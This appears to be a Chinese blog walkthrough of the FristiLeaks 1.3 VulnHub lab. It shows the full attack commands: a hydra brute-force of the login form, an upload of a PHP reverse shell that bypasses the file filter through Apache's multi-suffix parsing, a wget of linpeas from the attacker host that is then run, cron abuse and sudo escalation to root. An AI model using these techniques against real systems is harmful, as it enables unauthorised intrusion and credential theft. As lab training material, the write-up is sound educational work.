vulnhub FristiLeaks: 1.3

最新推荐文章于 2024-03-19 15:51:19 发布
最新推荐文章于 2024-03-19 15:51:19 发布
阅读量2.2k 收藏 1
点赞数
分类专栏: vulnhub 文章标签: 安全 python sudo提权 hydra 解析漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/122570145
版权

渗透思路:

nmap扫描----->查看robots.txt,并根据主页信息推测出admin portal的url----->查看网页源代码,分析注释,base64解码出包含重要信息的png图片----->hydra暴力破解网站用户名密码(其实不需要暴力破解)----->利用文件上传(apache httpd多后缀文件解析漏洞)获得反弹shell----->利用定时文件修改目录权限----->编写python脚本解码,得到admin和fristigod的密码----->sudo提权获得root权限

环境信息:

靶机ip:192.168.101.43

攻击机ip:192.168.101.25

具体步骤:

步骤1:nmap扫描

sudo nmap -sS -A -p- 192.168.101.43

扫半天扫出个80端口。nmap还不错哦,扫出来个robots.txt

步骤2:根据主页信息和robots.txt推测出admin portal的url

主页粉粉的真好看,这么大的座右铭一定有用

http://192.168.101.43/robots.txt 有三个不让爬虫扫描的目录

这三个目录下都是同一张图

有点英语基础在身上的至少知道cola和beer是饮料,结合主页巨大的座右铭,drink fristi,难不成,应该访问http://192.168.101.43/fristi

还真是,得到了admin portal的登录页面

步骤3:查看网页源代码,分析注释

在http://192.168.101.43/fristi页面右键查看网页源代码,发现两段注释

第一段是个TODO list,是eezeepz写的,意思是他为了测试方便留了点东西在这儿,生产环境中需要删除。

 第二段看上去是base64编码的

把这段注释中的base64编码的字符串保存到文件p2.txt中,并用base64 -d命令进行解码

base64 -d p2.txt

看到解码的结果第一行有个PNG,把结果保存为.png格式试试

base64 -d p2.txt > p2.png

打开p2.png看看,内容是keKkeKKeKKeKkEkkEk,备用

步骤4:hydra暴力破解网站用户名密码(其实不需要暴力破解TAT)

在http://192.168.101.43/fristi随便输入个用户名密码,点Login之后会提示用户名或密码错误。那这种报错情况就得同时暴力破解用户名和密码了。

burp抓到的报文如下,登录参数发往http://192.168.101.43/fristi/checklogin.php,用户名参数名为myusername,密码参数名为mypassword

来生成用户名和密码字典,使用cewl命令把网站首页上超过4个字母的单词扒拉下来

 cewl http://192.168.101.43 -m 4 -w fristi.txt

看看fristi.txt,里面都是纯英文单词,没有数字和符号

我手工把数字加上了 TAT

把上一步注释中的eezeepz和图片中的keKkeKKeKKeKkEkkEk加上

 用hydra爆破

hydra -L fristi.txt -P fristi.txt 192.168.101.43 http-post-form "/fristi/checklogin.php:myusername=^USER^&mypassword=^PASS^&Submit=Login:Wrong"

破解出来用户名是 eezeepz 密码是 keKkeKKeKKeKkEkkEk

步骤5:利用文件上传获得反弹shell

用上一步爆破出的用户名密码登录网站之后,发现可以上传文件

先上传一个php文件试试,我上传的文件名叫php-reverse.php,是用kali自带的反弹shell : /usr/share/webshells/php/php-reverse-shell.php修改了$ip和$port的值之后得到的

上传失败,提示只能上传jpg,png,gif

分析一下,从错误提示看,没有弹框,不像是前端过滤,并且明确提示了可以上传的文件类型,有可能是需要进行MIME绕过,或者magic number绕过,或者文件类型白名单绕过,或者兼而有之。

先试试简单的修改MIME、magic number

如下图所示Content-Type改为image/gif,文件内容最前面加GIF89a,发送请求报文之后,还是上传文件失败,看来文件后缀白名单绕过是逃不掉了。

先试试直接把文件后缀改成.gif,发送请求报文后,提示上传成功,文件被保存在/uploads文件夹下

浏览器访问 http://192.168.101.43/fristi/uploads/php-reverse.gif,并没有触发反弹shell

步骤1中nmap扫描出来靶机的web服务器是apache httpd,由于用户的不安全配置,是可能出现多后缀文件解析漏洞的。一种可能性是从右向左读文件后缀,直到读到可解析的后缀为止,另一种就像下面这篇博文写的,只要多个后缀中包含一个.php,就会被解析为php。

apache httpd多后缀解析漏洞复现 - 雨中落叶 - 博客园

因此,将发送的文件名改为 php-reverse.php.gif,发送成功

浏览器访问 http://192.168.101.43/fristi/uploads/php-reverse.php.gif

攻击机上监听端口得到反弹shell

步骤6:利用定时文件修改目录权限

首先进入/tmp目录,下载并执行linpeas.sh检查提权的可能路径,然而并没有得到啥有用的结果

wget http://192.168.101.25/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh

查看/var/www,本来想看看有没有配置文件暴露mysql或者其他用户名和密码,结果没找到配置文件,找到个notes.txt,里面的信息指向eezeepz的home目录

根据提示进入/home/eezeepz目录,又发现一个notes.txt,这个信息量比较大,大意是说可以在/tmp/目录下创建一个叫runthis的文件,每行一个命令,这样每分钟这个文件就会以admin的身份执行一次。但是这个文件中使用的命令也是有限制的,chmod,df,cat,echo,ps,grep,egrep命令必须使用/home/admin目录下的,其他命令必须使用/usr/bin目录下的,并且runthis文件中出现的命令必须以完整路径的形式给出。

根据提示来到/tmp/下面,输入

echo "/home/admin/chmod 777 /home/admin;" >runthis
chmod +x runthis

 创建了内容为/home/admin/chmod 777 /home/admin;,权限为777的文件runthis

 

等上个不到1分钟,就会出现cronresult文件,表示runthis已经被执行了,查看cronresult的内容可以知道runthis有没有被执行成功,如果失败是什么原因。

执行成功之后,原本没有权限的/home/admin目录就可以进入了。

步骤7:编写python脚本解码,得到admin和fristigod的密码

这个目录下有3个特别的文件,分别叫cryptedpass.txt,cryptpass.py和whoisyourgodnow.txt

看一下这三个文件的内容

cryptedpass.txt:

mVGZ3O3omkJLmy2pcuTq

whoisyourgodnow.txt:

=RFn0AKnlMHMPIzpyuTI0ITG

cryptpass.py:

import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

cryptedpass.txt和whoisyourgodnow.txt的内容看起来像base64;再通过cryptpass.py的内容,大概就知道cryptedpass.txt和whoisyourgodnow.txt的内容到底是怎么回事了。

cryptpass.py中的python代码,首先将命令行输入的参数进行base64编码,结果倒序之后再进行rot13编码。

而cryptedpass.txt和whoisyourgodnow.txt中奇奇怪怪的内容可能就是用cryptpass.py处理了某个字符串之后的结果。

为了解码,在攻击机上新建一个文件decode.py,写入如下python代码:

import base64,codecs,sys

def decodeString(str):
    base64string= codecs.decode(str, 'rot13')
    string= base64.b64decode(base64string[::-1])
    return string

Result=decodeString(sys.argv[1])
print Result

解码whoisyourgodnow.txt的内容

python decode.py =RFn0AKnlMHMPIzpyuTI0ITG

解码出来的结果是 LetThereBeFristi! ,这个是fristigod的密码

 

再解码cryptedpass.txt的内容

python decode.py mVGZ3O3omkJLmy2pcuTq

解码结果是 thisisalsopw123 ,这个是admin的密码

 

用su命令可以提权到admin或者fristigod

步骤8:sudo提权获得root权限

su到admin之后没有发现什么提权途径,su到fristigod之后,执行sudo -l发现fristigod可以sudo执行/var/fristigod/.secret_admin_stuff/doCom

执行

sudo /var/fristigod/.secret_admin_stuff/doCom

结果提示当前用户不能以root权限执行这个文件

试了几个用户之后,查看/etc/passwd发现有fristi用户 

以这个用户的权限执行 /var/fristigod/.secret_admin_stuff/doCom

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

用法提示文件名之后要加上终端命令 

执行 

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

得到root权限 

仙女象
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub】---FristiLeaks_1.3靶机
qq_43168364的博客
08-22 848
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:FristiLeaks: 1.3靶机(192.168.15.155) 攻击机:kali Linux(192.168.15.129) 相关设置 根据官网的提示这里需要给靶机设置MAC地址 设置好了之后就可以开心的玩耍了。 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r
VulnHub-FRISTILEAKS 1.3
热门推荐
江左盟的博客
12-02 1万+
简介 这是一台CTF类的靶机,比较考验脑洞,我个人不大喜欢,能想到作者的设计的点会觉得简单,想不到就觉得难。该靶机通过网页源码获取登录用户名和密码,然后利用Apache解析漏洞获取服务器权限,可利用脏牛直接提升至root用户权限,也可利用计划任务先获取admin用户权限,然后解密密文获得fristigod用户登录密码,最后利用SUID程序提升至root权限。 靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 信息收集 使用nmap --min-
vulnhub-FRISTILEAKS 1.3
GALi_233的博客
02-26 3628
Description About: Name: Fristileaks 1.3 Author: Ar0xA Series: Fristileaks Style: Enumeration/Follow the breadcrumbs Goal: get root (uid 0) and read the flag file Tester(s): dqi, barrebas Difficulty: Basic Description: A small VM made for a Dutch informal
vulnhub渗透系列之FristiLeaks: 1.3
来到了学渣的博客
02-06 2078
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.该靶机安装好后自动提示了IP地址,所以直接探测存活的端口就行,发现与以往不一样的是它只开放了80端口,nmap同时也扫出来cola/sisi/beer三个目录。 2.进入80端web页面,登录到cola/sisi/beer发现图片提示主要...
16-VulnHub-FristiLeaks 1.3
尼德霍格007
08-11 176
VulnHub-FristiLeaks: 1.3 靶机地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 目标:得到root权限&找到四个flag.txt 作者:尼德霍格007 时间:2021-8-10 注意:这台靶机和之前的有一点不一样,要手动把网卡的MAC地址设置为08:00:27:A5:A6:76才行 本文用到的代码请勿用于非法用途,否则后果自负 一、信息收集 设置完MAC地址后靶机IP会直接显现,不需要探测 这里已经显示了IP:192.
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
打靶练习vulnhub: stapler
最新发布
03-28
打靶练习vulnhub: stapler
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
VulnHub:VulnHub Box演练
03-16
VulnHub:VulnHub Box演练
vulnhub:本地搜索NVD
05-09
Vulnhub __ __ _ _ _ _ \ \ / / | | | | | | | | \ \ / /_ _ | | _ __ | |__| | _ _ | |__ \ \/ /| | | || || '_ \ | __ || | | || '_ \ \ / | |_| || || | | || | | || |_| || |_) | \/ \__,_||_||_| |_||_|...
FristiLeaks_1.3
cxyzupup的博客
01-10 493
FristiLeaks_1.3 项目地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 提示: (1)靶机网络连接方式使用NAT模式 (2)该靶机做了地址绑定,因此需要设置固定物理地址才能获取IP地址;物理地址为:08:00:27:A5:A6:76 文章目录FristiLeaks_1.3一、信息收集1. 使用nmap收集端口服务信息:2. 查看tcp80端口:3. 使用gobuster工具对http服务进行枚举:3.1 查看/images目录:3.2 查
Vulnhub靶机:FristiLeaks_1.3
qq_48904485的博客
03-19 948
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:FristiLeaks 1.3(10.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/注意安装靶机的时候需要将靶机的MAC地址改为:08:00:27:A5:A6:76,否则靶机ip地址会获取不到。
Vulnhub 渗透练习(七)—— FRISTILEAKS: 1.3
shinygod的博客
02-19 537
仔细阅读一些留言或者是解释。可以利用漏洞探针快速查询漏洞。脏牛的简单利用,及影响版本。
靶机:FristiLeaks_1.3
AzVoidSUN的博客
05-10 859
下载连接 https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristilea ks/FristiLeaks_1.3.ova 运行环境 Virtualbox (二选一) Vnware Workstation player VMware用户将需要手动将VM...
FristiLeaks_1.3#攻略
qq_27466929的博客
09-21 1084
FristiLeaks_1.3#攻略
5.100个渗透测试实战#5(FristiLeaks_1.3
qwsn
03-25 2416
目录 一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现 1.查看kali的网卡和IP信息(网卡名:eth0,IP:192.168.97.129); 2.查看靶机页面; 3.探测特定网络内的主机存活状态(netdiscover、arp-scan、nmap); 4.分析所得; (二)信息收集——端口(服务)扫描; 1.扫描端口,以及端口对应的服务,以及靶机的运行...
靶机渗透FristiLeaks1.3 ☀️新手详细☀️
君莫hacker的博客
09-08 7051
靶机FristiLeaks1.3的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/fristileaks-13,133/ 作者 Ar0xA 发布日期 2015年12月14日 难度 中等 靶机基本介绍: 一个小型虚拟机是为一个叫做Fristileaks的荷兰非正式黑客聚会而设计的。意味着可以在几个小时内完成,
2021年1月23日-NO16-Vulnhub-FristiLeaks_1.3渗透学习
AnonyMousIT的博客
01-24 471
2021年1月23日-NO:16-Vulnhub-FristiLeaks_1.3渗透学习 一、简介 靶机地址:https://www.vulnhub.com/entry/fristileaks-13,133/ kali地址:192.168.31.77 靶机ip地址:192.168.31.123 重要提示: 刚开始时怎么也扫描不到靶机的IP地址,看了靶机的介绍才知道, 一定要将靶机的mac地址设置为08:00:27:A5:A6:76!!!! 二、信息收集 发现只开启着80端口 访问web页面 查看rob
靶机渗透(六)FristiLeaks
qq_42180996的博客
04-30 1296
靶机FristiLeaks 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页 2.目录扫描(dirb) 3.浏览目录 4.Keep calm and drink fristi ...
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值